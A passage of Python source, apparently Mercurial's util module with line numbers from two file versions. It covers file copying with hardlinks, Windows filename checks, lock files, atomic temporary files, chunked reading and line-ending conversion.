1628 1650
1629 1651 copystat and checkambig should be exclusive.
1630 1652 '''
1631 1653 assert not (copystat and checkambig)
1632 1654 oldstat = None
1633 1655 if os.path.lexists(dest):
1634 1656 if checkambig:
1635 1657 oldstat = checkambig and filestat.frompath(dest)
1636 1658 unlink(dest)
1637 1659 if hardlink:
1638 1660 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1639 1661 # unless we are confident that dest is on a whitelisted filesystem.
1640 1662 try:
1641 1663 fstype = getfstype(os.path.dirname(dest))
1642 1664 except OSError:
1643 1665 fstype = None
1644 1666 if fstype not in _hardlinkfswhitelist:
1645 1667 hardlink = False
1646 1668 if hardlink:
1647 1669 try:
1648 1670 oslink(src, dest)
1649 1671 return
1650 1672 except (IOError, OSError):
1651 1673 pass # fall back to normal copy
1652 1674 if os.path.islink(src):
1653 1675 os.symlink(os.readlink(src), dest)
1654 1676 # copytime is ignored for symlinks, but in general copytime isn't needed
1655 1677 # for them anyway
1656 1678 else:
1657 1679 try:
1658 1680 shutil.copyfile(src, dest)
1659 1681 if copystat:
1660 1682 # copystat also copies mode
1661 1683 shutil.copystat(src, dest)
1662 1684 else:
1663 1685 shutil.copymode(src, dest)
1664 1686 if oldstat and oldstat.stat:
1665 1687 newstat = filestat.frompath(dest)
1666 1688 if newstat.isambig(oldstat):
1667 1689 # stat of copied file is ambiguous to original one
1668 1690 advanced = (
1669 1691 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1670 1692 os.utime(dest, (advanced, advanced))
1671 1693 except shutil.Error as inst:
1672 1694 raise error.Abort(str(inst))
1673 1695
1674 1696 def copyfiles(src, dst, hardlink=None, progress=None):
1675 1697 """Copy a directory tree using hardlinks if possible."""
1676 1698 num = 0
1677 1699
1678 1700 def settopic():
1679 1701 if progress:
1680 1702 progress.topic = _('linking') if hardlink else _('copying')
1681 1703
1682 1704 if os.path.isdir(src):
1683 1705 if hardlink is None:
1684 1706 hardlink = (os.stat(src).st_dev ==
1685 1707 os.stat(os.path.dirname(dst)).st_dev)
1686 1708 settopic()
1687 1709 os.mkdir(dst)
1688 1710 for name, kind in listdir(src):
1689 1711 srcname = os.path.join(src, name)
1690 1712 dstname = os.path.join(dst, name)
1691 1713 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1692 1714 num += n
1693 1715 else:
1694 1716 if hardlink is None:
1695 1717 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1696 1718 os.stat(os.path.dirname(dst)).st_dev)
1697 1719 settopic()
1698 1720
1699 1721 if hardlink:
1700 1722 try:
1701 1723 oslink(src, dst)
1702 1724 except (IOError, OSError):
1703 1725 hardlink = False
1704 1726 shutil.copy(src, dst)
1705 1727 else:
1706 1728 shutil.copy(src, dst)
1707 1729 num += 1
1708 1730 if progress:
1709 1731 progress.increment()
1710 1732
1711 1733 return hardlink, num
1712 1734
1713 1735 _winreservednames = {
1714 1736 'con', 'prn', 'aux', 'nul',
1715 1737 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1716 1738 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1717 1739 }
1718 1740 _winreservedchars = ':*?"<>|'
1719 1741 def checkwinfilename(path):
1720 1742 r'''Check that the base-relative path is a valid filename on Windows.
1721 1743 Returns None if the path is ok, or a UI string describing the problem.
1722 1744
1723 1745 >>> checkwinfilename(b"just/a/normal/path")
1724 1746 >>> checkwinfilename(b"foo/bar/con.xml")
1725 1747 "filename contains 'con', which is reserved on Windows"
1726 1748 >>> checkwinfilename(b"foo/con.xml/bar")
1727 1749 "filename contains 'con', which is reserved on Windows"
1728 1750 >>> checkwinfilename(b"foo/bar/xml.con")
1729 1751 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1730 1752 "filename contains 'AUX', which is reserved on Windows"
1731 1753 >>> checkwinfilename(b"foo/bar/bla:.txt")
1732 1754 "filename contains ':', which is reserved on Windows"
1733 1755 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1734 1756 "filename contains '\\x07', which is invalid on Windows"
1735 1757 >>> checkwinfilename(b"foo/bar/bla ")
1736 1758 "filename ends with ' ', which is not allowed on Windows"
1737 1759 >>> checkwinfilename(b"../bar")
1738 1760 >>> checkwinfilename(b"foo\\")
1739 1761 "filename ends with '\\', which is invalid on Windows"
1740 1762 >>> checkwinfilename(b"foo\\/bar")
1741 1763 "directory name ends with '\\', which is invalid on Windows"
1742 1764 '''
1743 1765 if path.endswith('\\'):
1744 1766 return _("filename ends with '\\', which is invalid on Windows")
1745 1767 if '\\/' in path:
1746 1768 return _("directory name ends with '\\', which is invalid on Windows")
1747 1769 for n in path.replace('\\', '/').split('/'):
1748 1770 if not n:
1749 1771 continue
1750 1772 for c in _filenamebytestr(n):
1751 1773 if c in _winreservedchars:
1752 1774 return _("filename contains '%s', which is reserved "
1753 1775 "on Windows") % c
1754 1776 if ord(c) <= 31:
1755 1777 return _("filename contains '%s', which is invalid "
1756 1778 "on Windows") % stringutil.escapestr(c)
1757 1779 base = n.split('.')[0]
1758 1780 if base and base.lower() in _winreservednames:
1759 1781 return _("filename contains '%s', which is reserved "
1760 1782 "on Windows") % base
1761 1783 t = n[-1:]
1762 1784 if t in '. ' and n not in '..':
1763 1785 return _("filename ends with '%s', which is not allowed "
1764 1786 "on Windows") % t
1765 1787
1766 1788 if pycompat.iswindows:
1767 1789 checkosfilename = checkwinfilename
1768 1790 timer = time.clock
1769 1791 else:
1770 1792 checkosfilename = platform.checkosfilename
1771 1793 timer = time.time
1772 1794
1773 1795 if safehasattr(time, "perf_counter"):
1774 1796 timer = time.perf_counter
1775 1797
1776 1798 def makelock(info, pathname):
1777 1799 """Create a lock file atomically if possible
1778 1800
1779 1801 This may leave a stale lock file if symlink isn't supported and signal
1780 1802 interrupt is enabled.
1781 1803 """
1782 1804 try:
1783 1805 return os.symlink(info, pathname)
1784 1806 except OSError as why:
1785 1807 if why.errno == errno.EEXIST:
1786 1808 raise
1787 1809 except AttributeError: # no symlink in os
1788 1810 pass
1789 1811
1790 1812 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1791 1813 ld = os.open(pathname, flags)
1792 1814 os.write(ld, info)
1793 1815 os.close(ld)
1794 1816
1795 1817 def readlock(pathname):
1796 1818 try:
1797 1819 return os.readlink(pathname)
1798 1820 except OSError as why:
1799 1821 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1800 1822 raise
1801 1823 except AttributeError: # no symlink in os
1802 1824 pass
1803 1825 fp = posixfile(pathname, 'rb')
1804 1826 r = fp.read()
1805 1827 fp.close()
1806 1828 return r
1807 1829
1808 1830 def fstat(fp):
1809 1831 '''stat file object that may not have fileno method.'''
1810 1832 try:
1811 1833 return os.fstat(fp.fileno())
1812 1834 except AttributeError:
1813 1835 return os.stat(fp.name)
1814 1836
1815 1837 # File system features
1816 1838
1817 1839 def fscasesensitive(path):
1818 1840 """
1819 1841 Return true if the given path is on a case-sensitive filesystem
1820 1842
1821 1843 Requires a path (like /foo/.hg) ending with a foldable final
1822 1844 directory component.
1823 1845 """
1824 1846 s1 = os.lstat(path)
1825 1847 d, b = os.path.split(path)
1826 1848 b2 = b.upper()
1827 1849 if b == b2:
1828 1850 b2 = b.lower()
1829 1851 if b == b2:
1830 1852 return True # no evidence against case sensitivity
1831 1853 p2 = os.path.join(d, b2)
1832 1854 try:
1833 1855 s2 = os.lstat(p2)
1834 1856 if s2 == s1:
1835 1857 return False
1836 1858 return True
1837 1859 except OSError:
1838 1860 return True
1839 1861
1840 1862 try:
1841 1863 import re2
1842 1864 _re2 = None
1843 1865 except ImportError:
1844 1866 _re2 = False
1845 1867
1846 1868 class _re(object):
1847 1869 def _checkre2(self):
1848 1870 global _re2
1849 1871 try:
1850 1872 # check if match works, see issue3964
1851 1873 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1852 1874 except ImportError:
1853 1875 _re2 = False
1854 1876
1855 1877 def compile(self, pat, flags=0):
1856 1878 '''Compile a regular expression, using re2 if possible
1857 1879
1858 1880 For best performance, use only re2-compatible regexp features. The
1859 1881 only flags from the re module that are re2-compatible are
1860 1882 IGNORECASE and MULTILINE.'''
1861 1883 if _re2 is None:
1862 1884 self._checkre2()
1863 1885 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1864 1886 if flags & remod.IGNORECASE:
1865 1887 pat = '(?i)' + pat
1866 1888 if flags & remod.MULTILINE:
1867 1889 pat = '(?m)' + pat
1868 1890 try:
1869 1891 return re2.compile(pat)
1870 1892 except re2.error:
1871 1893 pass
1872 1894 return remod.compile(pat, flags)
1873 1895
1874 1896 @propertycache
1875 1897 def escape(self):
1876 1898 '''Return the version of escape corresponding to self.compile.
1877 1899
1878 1900 This is imperfect because whether re2 or re is used for a particular
1879 1901 function depends on the flags, etc, but it's the best we can do.
1880 1902 '''
1881 1903 global _re2
1882 1904 if _re2 is None:
1883 1905 self._checkre2()
1884 1906 if _re2:
1885 1907 return re2.escape
1886 1908 else:
1887 1909 return remod.escape
1888 1910
1889 1911 re = _re()
1890 1912
1891 1913 _fspathcache = {}
1892 1914 def fspath(name, root):
1893 1915 '''Get name in the case stored in the filesystem
1894 1916
1895 1917 The name should be relative to root, and be normcase-ed for efficiency.
1896 1918
1897 1919 Note that this function is unnecessary, and should not be
1898 1920 called, for case-sensitive filesystems (simply because it's expensive).
1899 1921
1900 1922 The root should be normcase-ed, too.
1901 1923 '''
1902 1924 def _makefspathcacheentry(dir):
1903 1925 return dict((normcase(n), n) for n in os.listdir(dir))
1904 1926
1905 1927 seps = pycompat.ossep
1906 1928 if pycompat.osaltsep:
1907 1929 seps = seps + pycompat.osaltsep
1908 1930 # Protect backslashes. This gets silly very quickly.
1909 1931 seps.replace('\\','\\\\')
1910 1932 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1911 1933 dir = os.path.normpath(root)
1912 1934 result = []
1913 1935 for part, sep in pattern.findall(name):
1914 1936 if sep:
1915 1937 result.append(sep)
1916 1938 continue
1917 1939
1918 1940 if dir not in _fspathcache:
1919 1941 _fspathcache[dir] = _makefspathcacheentry(dir)
1920 1942 contents = _fspathcache[dir]
1921 1943
1922 1944 found = contents.get(part)
1923 1945 if not found:
1924 1946 # retry "once per directory" per "dirstate.walk" which
1925 1947 # may take place for each patches of "hg qpush", for example
1926 1948 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1927 1949 found = contents.get(part)
1928 1950
1929 1951 result.append(found or part)
1930 1952 dir = os.path.join(dir, part)
1931 1953
1932 1954 return ''.join(result)
1933 1955
1934 1956 def checknlink(testfile):
1935 1957 '''check whether hardlink count reporting works properly'''
1936 1958
1937 1959 # testfile may be open, so we need a separate file for checking to
1938 1960 # work around issue2543 (or testfile may get lost on Samba shares)
1939 1961 f1, f2, fp = None, None, None
1940 1962 try:
1941 1963 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1942 1964 suffix='1~', dir=os.path.dirname(testfile))
1943 1965 os.close(fd)
1944 1966 f2 = '%s2~' % f1[:-2]
1945 1967
1946 1968 oslink(f1, f2)
1947 1969 # nlinks() may behave differently for files on Windows shares if
1948 1970 # the file is open.
1949 1971 fp = posixfile(f2)
1950 1972 return nlinks(f2) > 1
1951 1973 except OSError:
1952 1974 return False
1953 1975 finally:
1954 1976 if fp is not None:
1955 1977 fp.close()
1956 1978 for f in (f1, f2):
1957 1979 try:
1958 1980 if f is not None:
1959 1981 os.unlink(f)
1960 1982 except OSError:
1961 1983 pass
1962 1984
1963 1985 def endswithsep(path):
1964 1986 '''Check path ends with os.sep or os.altsep.'''
1965 1987 return (path.endswith(pycompat.ossep)
1966 1988 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1967 1989
1968 1990 def splitpath(path):
1969 1991 '''Split path by os.sep.
1970 1992 Note that this function does not use os.altsep because this is
1971 1993 an alternative of simple "xxx.split(os.sep)".
1972 1994 It is recommended to use os.path.normpath() before using this
1973 1995 function if need.'''
1974 1996 return path.split(pycompat.ossep)
1975 1997
1976 1998 def mktempcopy(name, emptyok=False, createmode=None):
1977 1999 """Create a temporary file with the same contents from name
1978 2000
1979 2001 The permission bits are copied from the original file.
1980 2002
1981 2003 If the temporary file is going to be truncated immediately, you
1982 2004 can use emptyok=True as an optimization.
1983 2005
1984 2006 Returns the name of the temporary file.
1985 2007 """
1986 2008 d, fn = os.path.split(name)
1987 2009 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1988 2010 os.close(fd)
1989 2011 # Temporary files are created with mode 0600, which is usually not
1990 2012 # what we want. If the original file already exists, just copy
1991 2013 # its mode. Otherwise, manually obey umask.
1992 2014 copymode(name, temp, createmode)
1993 2015 if emptyok:
1994 2016 return temp
1995 2017 try:
1996 2018 try:
1997 2019 ifp = posixfile(name, "rb")
1998 2020 except IOError as inst:
1999 2021 if inst.errno == errno.ENOENT:
2000 2022 return temp
2001 2023 if not getattr(inst, 'filename', None):
2002 2024 inst.filename = name
2003 2025 raise
2004 2026 ofp = posixfile(temp, "wb")
2005 2027 for chunk in filechunkiter(ifp):
2006 2028 ofp.write(chunk)
2007 2029 ifp.close()
2008 2030 ofp.close()
2009 2031 except: # re-raises
2010 2032 try:
2011 2033 os.unlink(temp)
2012 2034 except OSError:
2013 2035 pass
2014 2036 raise
2015 2037 return temp
2016 2038
2017 2039 class filestat(object):
2018 2040 """help to exactly detect change of a file
2019 2041
2020 2042 'stat' attribute is result of 'os.stat()' if specified 'path'
2021 2043 exists. Otherwise, it is None. This can avoid preparative
2022 2044 'exists()' examination on client side of this class.
2023 2045 """
2024 2046 def __init__(self, stat):
2025 2047 self.stat = stat
2026 2048
2027 2049 @classmethod
2028 2050 def frompath(cls, path):
2029 2051 try:
2030 2052 stat = os.stat(path)
2031 2053 except OSError as err:
2032 2054 if err.errno != errno.ENOENT:
2033 2055 raise
2034 2056 stat = None
2035 2057 return cls(stat)
2036 2058
2037 2059 @classmethod
2038 2060 def fromfp(cls, fp):
2039 2061 stat = os.fstat(fp.fileno())
2040 2062 return cls(stat)
2041 2063
2042 2064 __hash__ = object.__hash__
2043 2065
2044 2066 def __eq__(self, old):
2045 2067 try:
2046 2068 # if ambiguity between stat of new and old file is
2047 2069 # avoided, comparison of size, ctime and mtime is enough
2048 2070 # to exactly detect change of a file regardless of platform
2049 2071 return (self.stat.st_size == old.stat.st_size and
2050 2072 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2051 2073 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2052 2074 except AttributeError:
2053 2075 pass
2054 2076 try:
2055 2077 return self.stat is None and old.stat is None
2056 2078 except AttributeError:
2057 2079 return False
2058 2080
2059 2081 def isambig(self, old):
2060 2082 """Examine whether new (= self) stat is ambiguous against old one
2061 2083
2062 2084 "S[N]" below means stat of a file at N-th change:
2063 2085
2064 2086 - S[n-1].ctime < S[n].ctime: can detect change of a file
2065 2087 - S[n-1].ctime == S[n].ctime
2066 2088 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2067 2089 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2068 2090 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2069 2091 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2070 2092
2071 2093 Case (*2) above means that a file was changed twice or more at
2072 2094 same time in sec (= S[n-1].ctime), and comparison of timestamp
2073 2095 is ambiguous.
2074 2096
2075 2097 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2076 2098 timestamp is ambiguous".
2077 2099
2078 2100 But advancing mtime only in case (*2) doesn't work as
2079 2101 expected, because naturally advanced S[n].mtime in case (*1)
2080 2102 might be equal to manually advanced S[n-1 or earlier].mtime.
2081 2103
2082 2104 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2083 2105 treated as ambiguous regardless of mtime, to avoid overlooking
2084 2106 by confliction between such mtime.
2085 2107
2086 2108 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2087 2109 S[n].mtime", even if size of a file isn't changed.
2088 2110 """
2089 2111 try:
2090 2112 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2091 2113 except AttributeError:
2092 2114 return False
2093 2115
2094 2116 def avoidambig(self, path, old):
2095 2117 """Change file stat of specified path to avoid ambiguity
2096 2118
2097 2119 'old' should be previous filestat of 'path'.
2098 2120
2099 2121 This skips avoiding ambiguity, if a process doesn't have
2100 2122 appropriate privileges for 'path'. This returns False in this
2101 2123 case.
2102 2124
2103 2125 Otherwise, this returns True, as "ambiguity is avoided".
2104 2126 """
2105 2127 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2106 2128 try:
2107 2129 os.utime(path, (advanced, advanced))
2108 2130 except OSError as inst:
2109 2131 if inst.errno == errno.EPERM:
2110 2132 # utime() on the file created by another user causes EPERM,
2111 2133 # if a process doesn't have appropriate privileges
2112 2134 return False
2113 2135 raise
2114 2136 return True
2115 2137
2116 2138 def __ne__(self, other):
2117 2139 return not self == other
2118 2140
2119 2141 class atomictempfile(object):
2120 2142 '''writable file object that atomically updates a file
2121 2143
2122 2144 All writes will go to a temporary copy of the original file. Call
2123 2145 close() when you are done writing, and atomictempfile will rename
2124 2146 the temporary copy to the original name, making the changes
2125 2147 visible. If the object is destroyed without being closed, all your
2126 2148 writes are discarded.
2127 2149
2128 2150 checkambig argument of constructor is used with filestat, and is
2129 2151 useful only if target file is guarded by any lock (e.g. repo.lock
2130 2152 or repo.wlock).
2131 2153 '''
2132 2154 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2133 2155 self.__name = name # permanent name
2134 2156 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2135 2157 createmode=createmode)
2136 2158 self._fp = posixfile(self._tempname, mode)
2137 2159 self._checkambig = checkambig
2138 2160
2139 2161 # delegated methods
2140 2162 self.read = self._fp.read
2141 2163 self.write = self._fp.write
2142 2164 self.seek = self._fp.seek
2143 2165 self.tell = self._fp.tell
2144 2166 self.fileno = self._fp.fileno
2145 2167
2146 2168 def close(self):
2147 2169 if not self._fp.closed:
2148 2170 self._fp.close()
2149 2171 filename = localpath(self.__name)
2150 2172 oldstat = self._checkambig and filestat.frompath(filename)
2151 2173 if oldstat and oldstat.stat:
2152 2174 rename(self._tempname, filename)
2153 2175 newstat = filestat.frompath(filename)
2154 2176 if newstat.isambig(oldstat):
2155 2177 # stat of changed file is ambiguous to original one
2156 2178 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2157 2179 os.utime(filename, (advanced, advanced))
2158 2180 else:
2159 2181 rename(self._tempname, filename)
2160 2182
2161 2183 def discard(self):
2162 2184 if not self._fp.closed:
2163 2185 try:
2164 2186 os.unlink(self._tempname)
2165 2187 except OSError:
2166 2188 pass
2167 2189 self._fp.close()
2168 2190
2169 2191 def __del__(self):
2170 2192 if safehasattr(self, '_fp'): # constructor actually did something
2171 2193 self.discard()
2172 2194
2173 2195 def __enter__(self):
2174 2196 return self
2175 2197
2176 2198 def __exit__(self, exctype, excvalue, traceback):
2177 2199 if exctype is not None:
2178 2200 self.discard()
2179 2201 else:
2180 2202 self.close()
2181 2203
2182 2204 def unlinkpath(f, ignoremissing=False, rmdir=True):
2183 2205 """unlink and remove the directory if it is empty"""
2184 2206 if ignoremissing:
2185 2207 tryunlink(f)
2186 2208 else:
2187 2209 unlink(f)
2188 2210 if rmdir:
2189 2211 # try removing directories that might now be empty
2190 2212 try:
2191 2213 removedirs(os.path.dirname(f))
2192 2214 except OSError:
2193 2215 pass
2194 2216
2195 2217 def tryunlink(f):
2196 2218 """Attempt to remove a file, ignoring ENOENT errors."""
2197 2219 try:
2198 2220 unlink(f)
2199 2221 except OSError as e:
2200 2222 if e.errno != errno.ENOENT:
2201 2223 raise
2202 2224
2203 2225 def makedirs(name, mode=None, notindexed=False):
2204 2226 """recursive directory creation with parent mode inheritance
2205 2227
2206 2228 Newly created directories are marked as "not to be indexed by
2207 2229 the content indexing service", if ``notindexed`` is specified
2208 2230 for "write" mode access.
2209 2231 """
2210 2232 try:
2211 2233 makedir(name, notindexed)
2212 2234 except OSError as err:
2213 2235 if err.errno == errno.EEXIST:
2214 2236 return
2215 2237 if err.errno != errno.ENOENT or not name:
2216 2238 raise
2217 2239 parent = os.path.dirname(os.path.abspath(name))
2218 2240 if parent == name:
2219 2241 raise
2220 2242 makedirs(parent, mode, notindexed)
2221 2243 try:
2222 2244 makedir(name, notindexed)
2223 2245 except OSError as err:
2224 2246 # Catch EEXIST to handle races
2225 2247 if err.errno == errno.EEXIST:
2226 2248 return
2227 2249 raise
2228 2250 if mode is not None:
2229 2251 os.chmod(name, mode)
2230 2252
2231 2253 def readfile(path):
2232 2254 with open(path, 'rb') as fp:
2233 2255 return fp.read()
2234 2256
2235 2257 def writefile(path, text):
2236 2258 with open(path, 'wb') as fp:
2237 2259 fp.write(text)
2238 2260
2239 2261 def appendfile(path, text):
2240 2262 with open(path, 'ab') as fp:
2241 2263 fp.write(text)
2242 2264
2243 2265 class chunkbuffer(object):
2244 2266 """Allow arbitrary sized chunks of data to be efficiently read from an
2245 2267 iterator over chunks of arbitrary size."""
2246 2268
2247 2269 def __init__(self, in_iter):
2248 2270 """in_iter is the iterator that's iterating over the input chunks."""
2249 2271 def splitbig(chunks):
2250 2272 for chunk in chunks:
2251 2273 if len(chunk) > 2**20:
2252 2274 pos = 0
2253 2275 while pos < len(chunk):
2254 2276 end = pos + 2 ** 18
2255 2277 yield chunk[pos:end]
2256 2278 pos = end
2257 2279 else:
2258 2280 yield chunk
2259 2281 self.iter = splitbig(in_iter)
2260 2282 self._queue = collections.deque()
2261 2283 self._chunkoffset = 0
2262 2284
2263 2285 def read(self, l=None):
2264 2286 """Read L bytes of data from the iterator of chunks of data.
2265 2287 Returns less than L bytes if the iterator runs dry.
2266 2288
2267 2289 If size parameter is omitted, read everything"""
2268 2290 if l is None:
2269 2291 return ''.join(self.iter)
2270 2292
2271 2293 left = l
2272 2294 buf = []
2273 2295 queue = self._queue
2274 2296 while left > 0:
2275 2297 # refill the queue
2276 2298 if not queue:
2277 2299 target = 2**18
2278 2300 for chunk in self.iter:
2279 2301 queue.append(chunk)
2280 2302 target -= len(chunk)
2281 2303 if target <= 0:
2282 2304 break
2283 2305 if not queue:
2284 2306 break
2285 2307
2286 2308 # The easy way to do this would be to queue.popleft(), modify the
2287 2309 # chunk (if necessary), then queue.appendleft(). However, for cases
2288 2310 # where we read partial chunk content, this incurs 2 dequeue
2289 2311 # mutations and creates a new str for the remaining chunk in the
2290 2312 # queue. Our code below avoids this overhead.
2291 2313
2292 2314 chunk = queue[0]
2293 2315 chunkl = len(chunk)
2294 2316 offset = self._chunkoffset
2295 2317
2296 2318 # Use full chunk.
2297 2319 if offset == 0 and left >= chunkl:
2298 2320 left -= chunkl
2299 2321 queue.popleft()
2300 2322 buf.append(chunk)
2301 2323 # self._chunkoffset remains at 0.
2302 2324 continue
2303 2325
2304 2326 chunkremaining = chunkl - offset
2305 2327
2306 2328 # Use all of unconsumed part of chunk.
2307 2329 if left >= chunkremaining:
2308 2330 left -= chunkremaining
2309 2331 queue.popleft()
2310 2332 # offset == 0 is enabled by block above, so this won't merely
2311 2333 # copy via ``chunk[0:]``.
2312 2334 buf.append(chunk[offset:])
2313 2335 self._chunkoffset = 0
2314 2336
2315 2337 # Partial chunk needed.
2316 2338 else:
2317 2339 buf.append(chunk[offset:offset + left])
2318 2340 self._chunkoffset += left
2319 2341 left -= chunkremaining
2320 2342
2321 2343 return ''.join(buf)
2322 2344
2323 2345 def filechunkiter(f, size=131072, limit=None):
2324 2346 """Create a generator that produces the data in the file size
2325 2347 (default 131072) bytes at a time, up to optional limit (default is
2326 2348 to read all data). Chunks may be less than size bytes if the
2327 2349 chunk is the last chunk in the file, or the file is a socket or
2328 2350 some other type of file that sometimes reads less data than is
2329 2351 requested."""
2330 2352 assert size >= 0
2331 2353 assert limit is None or limit >= 0
2332 2354 while True:
2333 2355 if limit is None:
2334 2356 nbytes = size
2335 2357 else:
2336 2358 nbytes = min(limit, size)
2337 2359 s = nbytes and f.read(nbytes)
2338 2360 if not s:
2339 2361 break
2340 2362 if limit:
2341 2363 limit -= len(s)
2342 2364 yield s
2343 2365
2344 2366 class cappedreader(object):
2345 2367 """A file object proxy that allows reading up to N bytes.
2346 2368
2347 2369 Given a source file object, instances of this type allow reading up to
2348 2370 N bytes from that source file object. Attempts to read past the allowed
2349 2371 limit are treated as EOF.
2350 2372
2351 2373 It is assumed that I/O is not performed on the original file object
2352 2374 in addition to I/O that is performed by this instance. If there is,
2353 2375 state tracking will get out of sync and unexpected results will ensue.
2354 2376 """
2355 2377 def __init__(self, fh, limit):
2356 2378 """Allow reading up to <limit> bytes from <fh>."""
2357 2379 self._fh = fh
2358 2380 self._left = limit
2359 2381
2360 2382 def read(self, n=-1):
2361 2383 if not self._left:
2362 2384 return b''
2363 2385
2364 2386 if n < 0:
2365 2387 n = self._left
2366 2388
2367 2389 data = self._fh.read(min(n, self._left))
2368 2390 self._left -= len(data)
2369 2391 assert self._left >= 0
2370 2392
2371 2393 return data
2372 2394
2373 2395 def readinto(self, b):
2374 2396 res = self.read(len(b))
2375 2397 if res is None:
2376 2398 return None
2377 2399
2378 2400 b[0:len(res)] = res
2379 2401 return len(res)
2380 2402
2381 2403 def unitcountfn(*unittable):
2382 2404 '''return a function that renders a readable count of some quantity'''
2383 2405
2384 2406 def go(count):
2385 2407 for multiplier, divisor, format in unittable:
2386 2408 if abs(count) >= divisor * multiplier:
2387 2409 return format % (count / float(divisor))
2388 2410 return unittable[-1][2] % count
2389 2411
2390 2412 return go
2391 2413
2392 2414 def processlinerange(fromline, toline):
2393 2415 """Check that linerange <fromline>:<toline> makes sense and return a
2394 2416 0-based range.
2395 2417
2396 2418 >>> processlinerange(10, 20)
2397 2419 (9, 20)
2398 2420 >>> processlinerange(2, 1)
2399 2421 Traceback (most recent call last):
2400 2422 ...
2401 2423 ParseError: line range must be positive
2402 2424 >>> processlinerange(0, 5)
2403 2425 Traceback (most recent call last):
2404 2426 ...
2405 2427 ParseError: fromline must be strictly positive
2406 2428 """
2407 2429 if toline - fromline < 0:
2408 2430 raise error.ParseError(_("line range must be positive"))
2409 2431 if fromline < 1:
2410 2432 raise error.ParseError(_("fromline must be strictly positive"))
2411 2433 return fromline - 1, toline
2412 2434
2413 2435 bytecount = unitcountfn(
2414 2436 (100, 1 << 30, _('%.0f GB')),
2415 2437 (10, 1 << 30, _('%.1f GB')),
2416 2438 (1, 1 << 30, _('%.2f GB')),
2417 2439 (100, 1 << 20, _('%.0f MB')),
2418 2440 (10, 1 << 20, _('%.1f MB')),
2419 2441 (1, 1 << 20, _('%.2f MB')),
2420 2442 (100, 1 << 10, _('%.0f KB')),
2421 2443 (10, 1 << 10, _('%.1f KB')),
2422 2444 (1, 1 << 10, _('%.2f KB')),
2423 2445 (1, 1, _('%.0f bytes')),
2424 2446 )
2425 2447
2426 2448 class transformingwriter(object):
2427 2449 """Writable file wrapper to transform data by function"""
2428 2450
2429 2451 def __init__(self, fp, encode):
2430 2452 self._fp = fp
2431 2453 self._encode = encode
2432 2454
2433 2455 def close(self):
2434 2456 self._fp.close()
2435 2457
2436 2458 def flush(self):
2437 2459 self._fp.flush()
2438 2460
2439 2461 def write(self, data):
2440 2462 return self._fp.write(self._encode(data))
2441 2463
2442 2464 # Matches a single EOL which can either be a CRLF where repeated CR
2443 2465 # are removed or a LF. We do not care about old Macintosh files, so a
2444 2466 # stray CR is an error.
2445 2467 _eolre = remod.compile(br'\r*\n')
2446 2468
2447 2469 def tolf(s):
2448 2470 return _eolre.sub('\n', s)
2449 2471
2450 2472 def tocrlf(s):
2451 2473 return _eolre.sub('\r\n', s)
2452 2474
2453 2475 def _crlfwriter(fp):
2454 2476 return transformingwriter(fp, tocrlf)
2455 2477
2456 2478 if pycompat.oslinesep == '\r\n':
2457 2479 tonativeeol = tocrlf
2458 2480 fromnativeeol = tolf
2459 2481 nativeeolwriter = _crlfwriter
2460 2482 else:
2461 2483 tonativeeol = pycompat.identity
2462 2484 fromnativeeol = pycompat.identity
2463 2485 nativeeolwriter = pycompat.identity
2464 2486
2465 2487 if (pyplatform.python_implementation() == 'CPython' and
2466 2488 sys.version_info < (3, 0)):
2467 2489 # There is an issue in CPython that some IO methods do not handle EINTR
2468 2490 # correctly. The following table shows what CPython version (and functions)
2469 2491 # are affected (buggy: has the EINTR bug, okay: otherwise):
2470 2492 #
2471 2493 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2472 2494 # --------------------------------------------------
2473 2495 # fp.__iter__ | buggy | buggy | okay
2474 2496 # fp.read* | buggy | okay [1] | okay
2475 2497 #
2476 2498 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2477 2499 #
2478 2500 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2479 2501 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2480 2502 #
2481 2503 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2482 2504 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2483 2505 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2484 2506 # fp.__iter__ but not other fp.read* methods.
2485 2507 #
2486 2508 # On modern systems like Linux, the "read" syscall cannot be interrupted
2487 2509 # when reading "fast" files like on-disk files. So the EINTR issue only
2488 2510 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
